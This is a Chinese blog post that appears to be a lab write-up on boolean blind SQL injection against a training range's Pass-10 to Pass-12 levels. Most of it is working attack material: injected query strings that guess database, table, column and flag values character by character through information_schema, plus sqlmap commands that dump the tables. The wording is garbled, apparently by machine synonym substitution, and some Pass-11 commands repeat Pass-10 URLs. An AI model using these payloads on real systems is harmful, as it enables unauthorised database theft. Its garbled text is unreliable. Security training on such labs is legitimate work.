盲注引见
所谓的盲注就是在效劳器没有错误回显的时分完成的注入攻击。
效劳器没有错误回显,关于攻击者来说短少了十分重要的“调试信息”。
布尔盲注
布尔很明显Ture跟Fales,也就是说它只会依据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。
盲注函数
length() 函数 返回字符串的长度
substr() 截取字符串 (语法:SUBSTR(str,pos,len);)SUBSTR(截取什么字符,从哪里截取,截几长)
ascii() 返回字符的ascii码 [将字符变为数字wei]
当前数据库称号长度
?id=1 and length(database())>11
?id=1 and length(database())=12 当前库名:12个字符
数据库名
应用ASCII码猜解当前数据库称号:
and (ascii(substr(database(),1,1)))=115–+ 返回正常,阐明数据库称号第一位是s
and (ascii(substr(database(),2,1)))=101–+ 返回正常,阐明数据库称号第二位是e
?id=1 and substr(database(),1,1)='k'
要是用ABCD字母每一个字母都试一遍十分累
?id=1 and ascii(substr(database(),1,1))>107
?id=1 and ascii(substr(database(),1,1))=107
107代表字符是“K”
burp抓包
跑第二个数字
把1修正成2,也就是开端跑第二个数字
97是a
burp多个交换
数据库曾经爆出
107 97 110 119 111 108 111 110 103 120 105 97
kanwolongxia
sqlmap工具SQL注入
猜表名
and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101–+ 返回正常,阐明数据库表名的第一个的第一位是e
sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -v 3
猜字段名
and (ascii(substr((select column_name from information_schema.columns where table_name='zkaq' limit 0,1),1,1)))=102–+ 返回正常,阐明zkaq表中的列称号第一位是f
sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag –columns
猜内容
and (ascii(substr(( select zKaQ from zkaq limit 4,1),1,1)))=122–+返回正常,阐明zKaQ列第一位是z
sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag -C Id,flaglo –dump
Pass-11
闭合字符”
Sqlmap工具
数据库名
sqlmap -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 –level 3 –risk 2 –flush-session –dbs
猜表名
sqlmap -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 –level 3 –risk 2 –flush-session –tables -D kanwolongxia -v 3
猜字段名
sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag –columns
猜内容
sqlmap -u "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1" –level 3 –risk 2 –flush-session –tables -D kanwolongxia -T loflag -C Id,flaglo –dump
Pass-12
数据库名
burp抓包
全部复制到kali系统内创立一个txt文件。
sqlmap -r sql.txt -b –dbs
猜表名
sqlmap -r sql.txt –tables -D kanwolongxia -v 3
猜字段名
sqlmap -r sql.txt –tables -D kanwolongxia -T loflag –columns
猜内容
sqlmap -r sql.txt –tables -D kanwolongxia -T loflag -C Id,flaglo –dump
感谢您的来访,获取更多精彩文章请收藏本站。
![](https://www.gyzsq.com/wp-content/uploads/2022/07/9259adea4619.gif)
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
![头像](/wp-content/themes/zibll/img/avatar-default.png)
- 最新
- 最热
只看作者